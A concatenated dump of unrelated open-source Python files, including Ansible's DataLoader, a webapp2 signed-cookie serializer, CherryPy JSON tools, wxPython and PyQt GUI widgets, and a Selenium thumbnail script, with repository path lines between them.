"""Generates an input file for graphviz's dot program.""" prefixes = [os.path.commonprefix(path) for path in paths] prefix = os.path.commonprefix(prefixes) print '// Build with "dot -Tpng -ooutput.png this_file.dot"' # "strict" collapses common paths. print 'strict digraph {' for path in paths: print (' -> '.join(EscapeForDot(item[len(prefix):]) for item in path)), ';' print '}' def Main(argv): # Check that dump.json exists and that it's not too old. 
dump_json_dirty = False try: st = os.stat('dump.json') file_age_s = time.time() - st.st_mtime if file_age_s > 2 * 60 * 60: print 'dump.json is more than 2 hours old.' dump_json_dirty = True except OSError: print 'dump.json not found.' dump_json_dirty = True if dump_json_dirty: print 'Run' print ' GYP_GENERATORS=dump_dependency_json build/gyp_chromium' print 'first, then try again.' sys.exit(1) g = json.load(open('dump.json')) if len(argv) not in (3, 4): usage() sys.exit(1) generate_dot = argv[1] == '--dot' if generate_dot: argv.pop(1) fro = MatchNode(g, argv[1]) to = MatchNode(g, argv[2]) paths = list(GetPath(g, fro, to)) if len(paths) > 0: if generate_dot: GenerateDot(fro, to, paths) else: print 'These paths lead from %s to %s:' % (fro, to) for path in paths: print ' -> '.join(path) else: print 'No paths found from %s to %s.' % (fro, to) if __name__ == '__main__': Main(sys.argv)
lavish205/olympia
refs/heads/master
src/olympia/abuse/tests/test_serializers.py
5
from olympia.abuse.models import AbuseReport from olympia.abuse.serializers import ( AddonAbuseReportSerializer, UserAbuseReportSerializer) from olympia.accounts.serializers import BaseUserSerializer from olympia.amo.tests import BaseTestCase, addon_factory, user_factory class TestAddonAbuseReportSerializer(BaseTestCase): def serialize(self, report, **extra_context): return AddonAbuseReportSerializer(report, context=extra_context).data def test_addon_report(self): addon = addon_factory(guid='@guid') report = AbuseReport(addon=addon, message='bad stuff') serial = self.serialize(report) assert serial == {'reporter': None, 'addon': {'guid': addon.guid, 'id': addon.id, 'slug': addon.slug}, 'message': 'bad stuff'} def test_guid_report(self): report = AbuseReport(guid='@guid', message='bad stuff') serial = self.serialize(report) assert serial == {'reporter': None, 'addon': {'guid': '@guid', 'id': None, 'slug': None}, 'message': 'bad stuff'} class TestUserAbuseReportSerializer(BaseTestCase): def serialize(self, report, **extra_context): return UserAbuseReportSerializer(report, context=extra_context).data def test_user_report(self): user = user_factory() report = AbuseReport(user=user, message='bad stuff') serial = self.serialize(report) user_serial = BaseUserSerializer(user).data assert serial == {'reporter': None, 'user': user_serial, 'message': 'bad stuff'}
yaqiyang/autorest
refs/heads/master
src/generator/AutoRest.Python.Tests/Expected/AcceptanceTests/Header/autorestswaggerbatheaderservice/__init__.py
25
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from .auto_rest_swagger_bat_header_service import AutoRestSwaggerBATHeaderService from .version import VERSION __all__ = ['AutoRestSwaggerBATHeaderService'] __version__ = VERSION
kvar/ansible
refs/heads/seas_master_2.9.5
lib/ansible/parsing/dataloader.py
25
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import copy import os import os.path import re import tempfile from ansible import constants as C from ansible.errors import AnsibleFileNotFound, AnsibleParserError from ansible.module_utils.basic import is_executable from ansible.module_utils.six import binary_type, text_type from ansible.module_utils._text import to_bytes, to_native, to_text from ansible.parsing.quoting import unquote from ansible.parsing.utils.yaml import from_yaml from ansible.parsing.vault import VaultLib, b_HEADER, is_encrypted, is_encrypted_file, parse_vaulttext_envelope from ansible.utils.path import unfrackpath from ansible.utils.display import Display display = Display() # Tries to determine if a path is inside a role, last dir must be 'tasks' # this is not perfect but people should really avoid 'tasks' dirs outside roles when using Ansible. RE_TASKS = re.compile(u'(?:^|%s)+tasks%s?$' % (os.path.sep, os.path.sep)) class DataLoader: ''' The DataLoader class is used to load and parse YAML or JSON content, either from a given file name or from a string that was previously read in through other means. A Vault password can be specified, and any vault-encrypted files will be decrypted. Data read from files will also be cached, so the file will never be read from disk more than once. Usage: dl = DataLoader() # optionally: dl.set_vault_password('foo') ds = dl.load('...') ds = dl.load_from_file('/path/to/file') ''' def __init__(self): self._basedir = '.' 
self._FILE_CACHE = dict() self._tempfiles = set() # initialize the vault stuff with an empty password # TODO: replace with a ref to something that can get the password # a creds/auth provider # self.set_vault_password(None) self._vaults = {} self._vault = VaultLib() self.set_vault_secrets(None) # TODO: since we can query vault_secrets late, we could provide this to DataLoader init def set_vault_secrets(self, vault_secrets): self._vault.secrets = vault_secrets def load(self, data, file_name='<string>', show_content=True): '''Backwards compat for now''' return from_yaml(data, file_name, show_content, self._vault.secrets) def load_from_file(self, file_name, cache=True, unsafe=False): ''' Loads data from a file, which can contain either JSON or YAML. ''' file_name = self.path_dwim(file_name) display.debug("Loading data from %s" % file_name) # if the file has already been read in and cached, we'll # return those results to avoid more file/vault operations if cache and file_name in self._FILE_CACHE: parsed_data = self._FILE_CACHE[file_name] else: # read the file contents and load the data structure from them (b_file_data, show_content) = self._get_file_contents(file_name) file_data = to_text(b_file_data, errors='surrogate_or_strict') parsed_data = self.load(data=file_data, file_name=file_name, show_content=show_content) # cache the file contents for next time self._FILE_CACHE[file_name] = parsed_data if unsafe: return parsed_data else: # return a deep copy here, so the cache is not affected return copy.deepcopy(parsed_data) def path_exists(self, path): path = self.path_dwim(path) return os.path.exists(to_bytes(path, errors='surrogate_or_strict')) def is_file(self, path): path = self.path_dwim(path) return os.path.isfile(to_bytes(path, errors='surrogate_or_strict')) or path == os.devnull def is_directory(self, path): path = self.path_dwim(path) return os.path.isdir(to_bytes(path, errors='surrogate_or_strict')) def list_directory(self, path): path = self.path_dwim(path) 
return os.listdir(path) def is_executable(self, path): '''is the given path executable?''' path = self.path_dwim(path) return is_executable(path) def _decrypt_if_vault_data(self, b_vault_data, b_file_name=None): '''Decrypt b_vault_data if encrypted and return b_data and the show_content flag''' if not is_encrypted(b_vault_data): show_content = True return b_vault_data, show_content b_ciphertext, b_version, cipher_name, vault_id = parse_vaulttext_envelope(b_vault_data) b_data = self._vault.decrypt(b_vault_data, filename=b_file_name) show_content = False return b_data, show_content def _get_file_contents(self, file_name): ''' Reads the file contents from the given file name If the contents are vault-encrypted, it will decrypt them and return the decrypted data :arg file_name: The name of the file to read. If this is a relative path, it will be expanded relative to the basedir :raises AnsibleFileNotFound: if the file_name does not refer to a file :raises AnsibleParserError: if we were unable to read the file :return: Returns a byte string of the file contents ''' if not file_name or not isinstance(file_name, (binary_type, text_type)): raise AnsibleParserError("Invalid filename: '%s'" % to_native(file_name)) b_file_name = to_bytes(self.path_dwim(file_name)) # This is what we really want but have to fix unittests to make it pass # if not os.path.exists(b_file_name) or not os.path.isfile(b_file_name): if not self.path_exists(b_file_name): raise AnsibleFileNotFound("Unable to retrieve file contents", file_name=file_name) try: with open(b_file_name, 'rb') as f: data = f.read() return self._decrypt_if_vault_data(data, b_file_name) except (IOError, OSError) as e: raise AnsibleParserError("an error occurred while trying to read the file '%s': %s" % (file_name, to_native(e)), orig_exc=e) def get_basedir(self): ''' returns the current basedir ''' return self._basedir def set_basedir(self, basedir): ''' sets the base directory, used to find files when a relative path is given 
''' if basedir is not None: self._basedir = to_text(basedir) def path_dwim(self, given): ''' make relative paths work like folks expect. ''' given = unquote(given) given = to_text(given, errors='surrogate_or_strict') if given.startswith(to_text(os.path.sep)) or given.startswith(u'~'): path = given else: basedir = to_text(self._basedir, errors='surrogate_or_strict') path = os.path.join(basedir, given) return unfrackpath(path, follow=False) def _is_role(self, path): ''' imperfect role detection, roles are still valid w/o tasks|meta/main.yml|yaml|etc ''' b_path = to_bytes(path, errors='surrogate_or_strict') b_upath = to_bytes(unfrackpath(path, follow=False), errors='surrogate_or_strict') for b_finddir in (b'meta', b'tasks'): for b_suffix in (b'.yml', b'.yaml', b''): b_main = b'main%s' % (b_suffix) b_tasked = os.path.join(b_finddir, b_main) if ( RE_TASKS.search(path) and os.path.exists(os.path.join(b_path, b_main)) or os.path.exists(os.path.join(b_upath, b_tasked)) or os.path.exists(os.path.join(os.path.dirname(b_path), b_tasked)) ): return True return False def path_dwim_relative(self, path, dirname, source, is_role=False): ''' find one file in either a role or playbook dir with or without explicitly named dirname subdirs Used in action plugins and lookups to find supplemental files that could be in either place. 
''' search = [] source = to_text(source, errors='surrogate_or_strict') # I have full path, nothing else needs to be looked at if source.startswith(to_text(os.path.sep)) or source.startswith(u'~'): search.append(unfrackpath(source, follow=False)) else: # base role/play path + templates/files/vars + relative filename search.append(os.path.join(path, dirname, source)) basedir = unfrackpath(path, follow=False) # not told if role, but detect if it is a role and if so make sure you get correct base path if not is_role: is_role = self._is_role(path) if is_role and RE_TASKS.search(path): basedir = unfrackpath(os.path.dirname(path), follow=False) cur_basedir = self._basedir self.set_basedir(basedir) # resolved base role/play path + templates/files/vars + relative filename search.append(unfrackpath(os.path.join(basedir, dirname, source), follow=False)) self.set_basedir(cur_basedir) if is_role and not source.endswith(dirname): # look in role's tasks dir w/o dirname search.append(unfrackpath(os.path.join(basedir, 'tasks', source), follow=False)) # try to create absolute path for loader basedir + templates/files/vars + filename search.append(unfrackpath(os.path.join(dirname, source), follow=False)) # try to create absolute path for loader basedir search.append(unfrackpath(os.path.join(basedir, source), follow=False)) # try to create absolute path for dirname + filename search.append(self.path_dwim(os.path.join(dirname, source))) # try to create absolute path for filename search.append(self.path_dwim(source)) for candidate in search: if os.path.exists(to_bytes(candidate, errors='surrogate_or_strict')): break return candidate def path_dwim_relative_stack(self, paths, dirname, source, is_role=False): ''' find one file in first path in stack taking roles into account and adding play basedir as fallback :arg paths: A list of text strings which are the paths to look for the filename in. :arg dirname: A text string representing a directory. 
The directory is prepended to the source to form the path to search for. :arg source: A text string which is the filename to search for :rtype: A text string :returns: An absolute path to the filename ``source`` if found :raises: An AnsibleFileNotFound Exception if the file is found to exist in the search paths ''' b_dirname = to_bytes(dirname, errors='surrogate_or_strict') b_source = to_bytes(source, errors='surrogate_or_strict') result = None search = [] if source is None: display.warning('Invalid request to find a file that matches a "null" value') elif source and (source.startswith('~') or source.startswith(os.path.sep)): # path is absolute, no relative needed, check existence and return source test_path = unfrackpath(b_source, follow=False) if os.path.exists(to_bytes(test_path, errors='surrogate_or_strict')): result = test_path else: display.debug(u'evaluation_path:\n\t%s' % '\n\t'.join(paths)) for path in paths: upath = unfrackpath(path, follow=False) b_upath = to_bytes(upath, errors='surrogate_or_strict') b_pb_base_dir = os.path.dirname(b_upath) # if path is in role and 'tasks' not there already, add it into the search if (is_role or self._is_role(path)) and b_pb_base_dir.endswith(b'/tasks'): search.append(os.path.join(os.path.dirname(b_pb_base_dir), b_dirname, b_source)) search.append(os.path.join(b_pb_base_dir, b_source)) else: # don't add dirname if user already is using it in source if b_source.split(b'/')[0] != dirname: search.append(os.path.join(b_upath, b_dirname, b_source)) search.append(os.path.join(b_upath, b_source)) # always append basedir as last resort # don't add dirname if user already is using it in source if b_source.split(b'/')[0] != dirname: search.append(os.path.join(to_bytes(self.get_basedir(), errors='surrogate_or_strict'), b_dirname, b_source)) search.append(os.path.join(to_bytes(self.get_basedir(), errors='surrogate_or_strict'), b_source)) display.debug(u'search_path:\n\t%s' % to_text(b'\n\t'.join(search))) for b_candidate in search: 
display.vvvvv(u'looking for "%s" at "%s"' % (source, to_text(b_candidate))) if os.path.exists(b_candidate): result = to_text(b_candidate) break if result is None: raise AnsibleFileNotFound(file_name=source, paths=[to_native(p) for p in search]) return result def _create_content_tempfile(self, content): ''' Create a tempfile containing defined content ''' fd, content_tempfile = tempfile.mkstemp() f = os.fdopen(fd, 'wb') content = to_bytes(content) try: f.write(content) except Exception as err: os.remove(content_tempfile) raise Exception(err) finally: f.close() return content_tempfile def get_real_file(self, file_path, decrypt=True): """ If the file is vault encrypted return a path to a temporary decrypted file If the file is not encrypted then the path is returned Temporary files are cleanup in the destructor """ if not file_path or not isinstance(file_path, (binary_type, text_type)): raise AnsibleParserError("Invalid filename: '%s'" % to_native(file_path)) b_file_path = to_bytes(file_path, errors='surrogate_or_strict') if not self.path_exists(b_file_path) or not self.is_file(b_file_path): raise AnsibleFileNotFound(file_name=file_path) real_path = self.path_dwim(file_path) try: if decrypt: with open(to_bytes(real_path), 'rb') as f: # Limit how much of the file is read since we do not know # whether this is a vault file and therefore it could be very # large. 
if is_encrypted_file(f, count=len(b_HEADER)): # if the file is encrypted and no password was specified, # the decrypt call would throw an error, but we check first # since the decrypt function doesn't know the file name data = f.read() if not self._vault.secrets: raise AnsibleParserError("A vault password or secret must be specified to decrypt %s" % to_native(file_path)) data = self._vault.decrypt(data, filename=real_path) # Make a temp file real_path = self._create_content_tempfile(data) self._tempfiles.add(real_path) return real_path except (IOError, OSError) as e: raise AnsibleParserError("an error occurred while trying to read the file '%s': %s" % (to_native(real_path), to_native(e)), orig_exc=e) def cleanup_tmp_file(self, file_path): """ Removes any temporary files created from a previous call to get_real_file. file_path must be the path returned from a previous call to get_real_file. """ if file_path in self._tempfiles: os.unlink(file_path) self._tempfiles.remove(file_path) def cleanup_all_tmp_files(self): for f in self._tempfiles: try: self.cleanup_tmp_file(f) except Exception as e: display.warning("Unable to cleanup temp files: %s" % to_text(e)) def find_vars_files(self, path, name, extensions=None, allow_dir=True): """ Find vars files in a given path with specified name. This will find files in a dir named <name>/ or a file called <name> ending in known extensions. """ b_path = to_bytes(os.path.join(path, name)) found = [] if extensions is None: # Look for file with no extension first to find dir before file extensions = [''] + C.YAML_FILENAME_EXTENSIONS # add valid extensions to name for ext in extensions: if '.' 
in ext: full_path = b_path + to_bytes(ext) elif ext: full_path = b'.'.join([b_path, to_bytes(ext)]) else: full_path = b_path if self.path_exists(full_path): if self.is_directory(full_path): if allow_dir: found.extend(self._get_dir_vars_files(to_text(full_path), extensions)) else: continue else: found.append(full_path) break return found def _get_dir_vars_files(self, path, extensions): found = [] for spath in sorted(self.list_directory(path)): if not spath.startswith(u'.') and not spath.endswith(u'~'): # skip hidden and backups ext = os.path.splitext(spath)[-1] full_spath = os.path.join(path, spath) if self.is_directory(full_spath) and not ext: # recursive search if dir found.extend(self._get_dir_vars_files(full_spath, extensions)) elif self.is_file(full_spath) and (not ext or to_text(ext) in extensions): # only consider files with valid extensions or no extension found.append(full_spath) return found
hschovanec-usgs/magpy
refs/heads/master
magpy/gui/streampage.py
1
#!/usr/bin/env python

from magpy.stream import *
from magpy.absolutes import *
from magpy.transfer import *
from magpy.database import *

import wx

from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
from matplotlib.backends.backend_wx import NavigationToolbar2Wx
from matplotlib.figure import Figure

import wx.lib.masked as masked

# Subclasses for Menu pages and their controls


class StreamPage(wx.Panel):
    """Panel with the stream-handling controls (time range, plot options,
    flagging methods).  Widgets are created in createControls() and arranged
    in a two-column FlexGridSizer in doLayout()."""

    def __init__(self, *args, **kwds):
        wx.Panel.__init__(self, *args, **kwds)
        # component systems and plot symbols offered in the radio boxes
        self.comp = ['xyz', 'hdz', 'idf']
        self.symbol = ['line', 'point']
        self.flagidlist = ['0: normal data', '1: automatically flagged', '2: keep data in any case',
                           '3: remove data', '4: special flag']
        self.createControls()
        self.doLayout()

    # Widgets
    def createControls(self):
        """Instantiate all widgets; layout happens separately in doLayout()."""
        self.lineLabel1 = wx.StaticText(self, label="  ")
        self.lineLabel2 = wx.StaticText(self, label="  ")
        self.lineLabel3 = wx.StaticText(self, label="  ")
        self.lineLabel4 = wx.StaticText(self, label="  ")
        self.pathLabel = wx.StaticText(self, label="Path/Source:")
        self.pathTextCtrl = wx.TextCtrl(self, value="")
        self.fileLabel = wx.StaticText(self, label="File/Table:")
        self.fileTextCtrl = wx.TextCtrl(self, value="*")
        self.startdateLabel = wx.StaticText(self, label="Start date:")
        self.startDatePicker = wx.DatePickerCtrl(self, style=wx.DP_DEFAULT)
        # the following line produces error in my win xp installation
        self.startTimePicker = wx.TextCtrl(self, value="00:00:00")
        self.enddateLabel = wx.StaticText(self, label="End date:")
        self.endDatePicker = wx.DatePickerCtrl(self, style=wx.DP_DEFAULT)
        self.endTimePicker = wx.TextCtrl(self, value=datetime.now().strftime('%X'))
        self.trimStreamButton = wx.Button(self,-1,"Trim timerange",size=(160,30))
        self.plotOptionsLabel = wx.StaticText(self, label="Plotting options:")
        self.flagOptionsLabel = wx.StaticText(self, label="Flagging methods:")
        self.selectKeysButton = wx.Button(self,-1,"Select Columns",size=(160,30))
        self.extractValuesButton = wx.Button(self,-1,"Extract Values",size=(160,30))
        self.restoreButton = wx.Button(self,-1,"Restore data",size=(160,30))
        self.changePlotButton = wx.Button(self,-1,"Plot Options",size=(160,30))
        self.dailyMeansButton = wx.Button(self,-1,"Daily Means",size=(160,30))
        self.applyBCButton = wx.Button(self,-1,"Baseline Corr",size=(160,30))
        self.flagOutlierButton = wx.Button(self,-1,"Flag Outlier",size=(160,30))
        self.flagRangeButton = wx.Button(self,-1,"Flag Range",size=(160,30))
        self.flagMinButton = wx.Button(self,-1,"Flag Minimum",size=(160,30))
        self.flagMaxButton = wx.Button(self,-1,"Flag Maximum",size=(160,30))
        self.xCheckBox = wx.CheckBox(self,label="X             ")
        self.yCheckBox = wx.CheckBox(self,label="Y             ")
        self.zCheckBox = wx.CheckBox(self,label="Z             ")
        self.fCheckBox = wx.CheckBox(self,label="F             ")
        self.FlagIDText = wx.StaticText(self,label="Select Min/Max Flag ID:")
        self.FlagIDComboBox = wx.ComboBox(self, choices=self.flagidlist,
            style=wx.CB_DROPDOWN, value=self.flagidlist[3],size=(160,-1))
        self.flagSelectionButton = wx.Button(self,-1,"Flag Selection",size=(160,30))
        self.flagDropButton = wx.Button(self,-1,"Drop flagged",size=(160,30))
        self.flagLoadButton = wx.Button(self,-1,"Load flags",size=(160,30))
        self.flagSaveButton = wx.Button(self,-1,"Save flags",size=(160,30))
        self.compRadioBox = wx.RadioBox(self, label="Select components",
            choices=self.comp, majorDimension=3, style=wx.RA_SPECIFY_COLS)
        self.symbolRadioBox = wx.RadioBox(self, label="Select symbols",
            choices=self.symbol, majorDimension=2, style=wx.RA_SPECIFY_COLS)
        self.annotateCheckBox = wx.CheckBox(self,label="annotate")
        self.errorBarsCheckBox = wx.CheckBox(self,label="error bars")
        self.confinexCheckBox = wx.CheckBox(self, label="confine time")
        self.compRadioBox.Disable()
        self.symbolRadioBox.Disable()

    def doLayout(self):
        """Arrange the controls in a two-column grid inside a horizontal sizer.

        Improvement over the original: the layout table used to be a list of
        *strings* that were eval()'d per entry; it is now a plain list of
        (control, options) tuples added in exactly the same order -- same
        layout, no eval, and typos become immediate NameErrors.
        """
        # A horizontal BoxSizer will contain the GridSizer (on the left)
        # and the logger text control (on the right):
        boxSizer = wx.BoxSizer(orient=wx.HORIZONTAL)
        # A GridSizer will contain the other controls:
        gridSizer = wx.FlexGridSizer(rows=28, cols=2, vgap=5, hgap=10)

        # Prepare some reusable arguments for calling sizer.Add():
        expandOption = dict(flag=wx.EXPAND)
        noOptions = dict()
        centerOption = dict(flag=wx.ALIGN_CENTER)
        emptySpace = ((0, 0), noOptions)

        elemlist = [
            (self.pathLabel, noOptions),
            (self.pathTextCtrl, expandOption),
            (self.fileLabel, noOptions),
            (self.fileTextCtrl, expandOption),
            (self.startdateLabel, noOptions),
            emptySpace,
            (self.startDatePicker, expandOption),
            (self.startTimePicker, expandOption),
            (self.enddateLabel, noOptions),
            emptySpace,
            (self.endDatePicker, expandOption),
            (self.endTimePicker, expandOption),
            (self.trimStreamButton, centerOption),
            (self.restoreButton, centerOption),
            (self.lineLabel1, noOptions),
            (self.lineLabel2, noOptions),
            (self.plotOptionsLabel, noOptions),
            emptySpace,
            (self.selectKeysButton, centerOption),
            (self.changePlotButton, centerOption),
            (self.extractValuesButton, centerOption),
            emptySpace,
            (self.compRadioBox, noOptions),
            (self.symbolRadioBox, noOptions),
            (self.annotateCheckBox, noOptions),
            (self.applyBCButton, centerOption),
            (self.confinexCheckBox, noOptions),
            (self.dailyMeansButton, centerOption),
            (self.errorBarsCheckBox, noOptions),
            emptySpace,
            (self.lineLabel3, noOptions),
            (self.lineLabel4, noOptions),
            (self.flagOptionsLabel, noOptions),
            emptySpace,
            (self.flagOutlierButton, centerOption),
            (self.flagSelectionButton, centerOption),
            (self.flagRangeButton, centerOption),
            (self.flagDropButton, centerOption),
            (self.flagMinButton, centerOption),
            (self.flagMaxButton, centerOption),
            (self.xCheckBox, noOptions),
            (self.yCheckBox, noOptions),
            (self.zCheckBox, noOptions),
            (self.fCheckBox, noOptions),
            (self.FlagIDText, noOptions),
            (self.FlagIDComboBox, expandOption),
            (self.flagLoadButton, centerOption),
            (self.flagSaveButton, centerOption),
            emptySpace,
            emptySpace,
        ]

        # modify look: ReDraw connected to radio and check boxes with dates
        # buttons automatically redraw the graph

        # Add the controls to the sizers:
        for control, options in elemlist:
            gridSizer.Add(control, **options)

        for control, options in \
                [(gridSizer, dict(border=5, flag=wx.ALL))]:
            boxSizer.Add(control, **options)

        self.SetSizerAndFit(boxSizer)
yencarnacion/jaikuengine
refs/heads/master
.google_appengine/lib/webapp2-2.3/webapp2_extras/securecookie.py
20
# -*- coding: utf-8 -*-
"""
    webapp2_extras.securecookie
    ===========================

    A serializer for signed cookies.

    :copyright: 2011 by tipfy.org.
    :license: Apache Software License, see LICENSE for details.
"""
import hashlib
import hmac
import logging
import time

from webapp2_extras import json
from webapp2_extras import security


class SecureCookieSerializer(object):
    """Serializes and deserializes secure cookie values.

    Extracted from `Tornado`_ and modified.

    Cookie format: ``<b64 value>|<timestamp>|<hmac-sha1 signature>``.
    """

    def __init__(self, secret_key):
        """Initializes the serializer/deserializer.

        :param secret_key:
            A random string (or bytes) to be used as the HMAC secret for
            the cookie signature.
        """
        self.secret_key = secret_key

    def serialize(self, name, value):
        """Serializes a signed cookie value.

        :param name:
            Cookie name.
        :param value:
            Cookie value to be serialized.
        :returns:
            A serialized value ready to be stored in a cookie.
        """
        timestamp = str(self._get_timestamp())
        value = self._encode(value)
        signature = self._get_signature(name, value, timestamp)
        return '|'.join([value, timestamp, signature])

    def deserialize(self, name, value, max_age=None):
        """Deserializes a signed cookie value.

        :param name:
            Cookie name.
        :param value:
            A cookie value to be deserialized.
        :param max_age:
            Maximum age in seconds for a valid cookie. If the cookie is
            older than this, returns None.
        :returns:
            The deserialized secure cookie, or None if it is not valid.
        """
        if not value:
            return None

        parts = value.split('|')
        if len(parts) != 3:
            return None

        # constant-time comparison to avoid timing attacks
        signature = self._get_signature(name, parts[0], parts[1])

        if not security.compare_hashes(parts[2], signature):
            logging.warning('Invalid cookie signature %r', value)
            return None

        if max_age is not None:
            if int(parts[1]) < self._get_timestamp() - max_age:
                logging.warning('Expired cookie %r', value)
                return None

        try:
            return self._decode(parts[0])
        except Exception:
            # fixed: was ``except Exception, e`` -- Python 2-only syntax that
            # is a SyntaxError on Python 3 (and ``e`` was never used)
            logging.warning('Cookie value failed to be decoded: %r', parts[0])
            return None

    def _encode(self, value):
        return json.b64encode(value)

    def _decode(self, value):
        return json.b64decode(value)

    def _get_timestamp(self):
        return int(time.time())

    def _get_signature(self, *parts):
        """Generates an HMAC-SHA1 signature over ``'|'.join(parts)``.

        Fixed for Python 3 compatibility: ``hmac.new`` and ``update`` require
        bytes there; str keys/parts are UTF-8 encoded (a no-op change for
        ASCII data under Python 2).
        """
        key = self.secret_key
        if not isinstance(key, bytes):
            key = key.encode('utf-8')
        signature = hmac.new(key, digestmod=hashlib.sha1)
        signature.update('|'.join(parts).encode('utf-8'))
        return signature.hexdigest()
MTG/gaia
refs/heads/master
src/bindings/pygaia/mtgdb/__init__.py
1
#!/usr/bin/env python # -*- coding: utf-8 -*- from .collection import Collection from .mtgdbcollection import MtgdbCollection
ET-CS/Simple-Python-Sitemap
refs/heads/master
gen_thumbs.py
1
#!/usr/bin/env python

## Import modules and helper functions
import os
import os.path

# Get working directory
path = os.path.dirname(os.path.abspath(__file__))

# tenjin Template Engine
import tenjin
# tenjin.set_template_encoding('cp932')   # template encoding
from tenjin.helpers import *

# Import settings file
import settings

from selenium import webdriver
from PIL import Image


def checkThumbnails():
    """Create a PNG thumbnail for every configured item that lacks one.

    For each entry in ``settings.context['items']`` (first element is the
    item's URL), a PhantomJS screenshot is taken at 1400x900, cropped and
    written to ``thumbs/<host>.png`` next to this script.  Existing
    thumbnails are left untouched.
    """
    for key in settings.context['items']:
        thumbnail = 'thumbs/' + key[0].split('//')[1] + '.png'
        if not os.path.isfile(path + '/' + thumbnail):
            print("downloading " + key[0])
            br = webdriver.PhantomJS()
            try:
                print(br.get_window_size())
                br.set_window_size(1400, 900)
                print(br.get_window_size())
                br.get(key[0])
                br.save_screenshot(thumbnail)
            finally:
                # Bug fix: the original said ``br.quit`` without parentheses,
                # which never called the method and leaked one PhantomJS
                # process per download.  try/finally ensures cleanup even when
                # the page load or screenshot fails.
                br.quit()
            if os.path.isfile(path + '/' + thumbnail):
                im = Image.open(thumbnail)
                # crop to the fixed viewport size before saving
                im = im.crop((0, 0, 1400, 900))
                im.save(thumbnail)


checkThumbnails()
jymannob/Sick-Beard
refs/heads/development
cherrypy/lib/jsontools.py
80
import sys
import cherrypy

# Pick a JSON implementation: the stdlib ``json`` module exists from
# Python 2.6 on; older interpreters fall back to simplejson if installed.
if sys.version_info >= (2, 6):
    # Python 2.6: json is part of the standard library
    import json
else:
    try:
        import simplejson as json
    except ImportError:
        json = None

if json is None:
    # Stub implementations so callers get a clear error at use time
    # instead of an AttributeError/NameError.
    def json_decode(s):
        raise ValueError('No JSON library is available')

    def json_encode(s):
        raise ValueError('No JSON library is available')
else:
    json_decode = json.JSONDecoder().decode
    # iterencode yields chunks; cherrypy streams them as the response body
    json_encode = json.JSONEncoder().iterencode


def json_in(force=True, debug=False):
    """CherryPy tool: parse an application/json request body into
    ``request.json``.

    When ``force`` is True, every other body processor is removed so any
    non-JSON content type is rejected with 415."""
    request = cherrypy.serving.request

    def json_processor(entity):
        """Read application/json data into request.json."""
        if not entity.headers.get(u"Content-Length", u""):
            # 411 Length Required: we refuse bodies of unknown length
            raise cherrypy.HTTPError(411)

        body = entity.fp.read()
        try:
            request.json = json_decode(body)
        except ValueError:
            raise cherrypy.HTTPError(400, 'Invalid JSON document')

    if force:
        request.body.processors.clear()
        request.body.default_proc = cherrypy.HTTPError(
            415, 'Expected an application/json content type')
    request.body.processors[u'application/json'] = json_processor


def json_out(debug=False):
    """CherryPy tool: wrap the page handler so its return value is JSON
    encoded and the Content-Type header is set accordingly."""
    request = cherrypy.serving.request
    response = cherrypy.serving.response

    # keep a reference to the original handler; json_handler delegates to it
    real_handler = request.handler

    def json_handler(*args, **kwargs):
        response.headers['Content-Type'] = 'application/json'
        value = real_handler(*args, **kwargs)
        return json_encode(value)

    request.handler = json_handler
wbsoft/frescobaldi
refs/heads/master
frescobaldi_app/widgets/tempobutton.py
3
# This file is part of the Frescobaldi project, http://www.frescobaldi.org/ # # Copyright (c) 2008 - 2014 by Wilbert Berendsen # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA # See http://www.gnu.org/licenses/ for more information. """ A button that emits a tempo(int) signal when the user clicks multiple times. """ import time from PyQt5.QtCore import pyqtSignal from PyQt5.QtWidgets import QToolButton import app import icons class TempoButton(QToolButton): """A button the user can tap a tempo on. emits tempo(bpm) when the user clicks the button multiple times. """ tempo = pyqtSignal(int) def __init__(self, icon=None, parent=None): super(TempoButton, self).__init__(parent) self.setIcon(icon or icons.get("media-record")) self.tapStart = 0.0 self.tapTime = 0.0 self.tapCount = 0 self.pressed.connect(self.slotPressed) app.translateUI(self) def translateUI(self): self.setToolTip(_("The tempo is set as you click this button.")) self.setWhatsThis(_( "Tap this button to set the tempo.\n\n" "The average speed of clicking is used; wait 3 seconds to \"reset\".")) def slotPressed(self): self.tapTime, t = time.time(), self.tapTime if 0.1 < self.tapTime - t < 3.0: self.tapCount += 1 bpm = int(60.0 * self.tapCount / (self.tapTime - self.tapStart)) self.tempo.emit(bpm) else: self.tapStart = self.tapTime self.tapCount = 0
wiki05/SublimeJEDI
refs/heads/master
jedi/evaluate/flow_analysis.py
5
from jedi.parser import tree as pr


class Status(object):
    """Three-valued reachability status (reachable / unreachable / unsure).

    Only the three singletons below are ever created; they are compared by
    identity throughout this module.
    """
    # Maps the raw truth value (True/False/None) to its singleton instance;
    # populated by __init__ as each singleton is constructed.
    lookup_table = {}

    def __init__(self, value, name):
        # value: True, False or None (= unsure); name is only for __repr__
        self._value = value
        self._name = name
        Status.lookup_table[value] = self

    def invert(self):
        # REACHABLE <-> UNREACHABLE; UNSURE stays UNSURE
        if self is REACHABLE:
            return UNREACHABLE
        elif self is UNREACHABLE:
            return REACHABLE
        else:
            return UNSURE

    def __and__(self, other):
        # Three-valued "and": UNSURE is absorbing; otherwise both operands
        # must be truthy for the result to be REACHABLE.
        if UNSURE in (self, other):
            return UNSURE
        else:
            return REACHABLE if self._value and other._value else UNREACHABLE

    def __repr__(self):
        return '<%s: %s>' % (type(self).__name__, self._name)


# The three singleton statuses.
REACHABLE = Status(True, 'reachable')
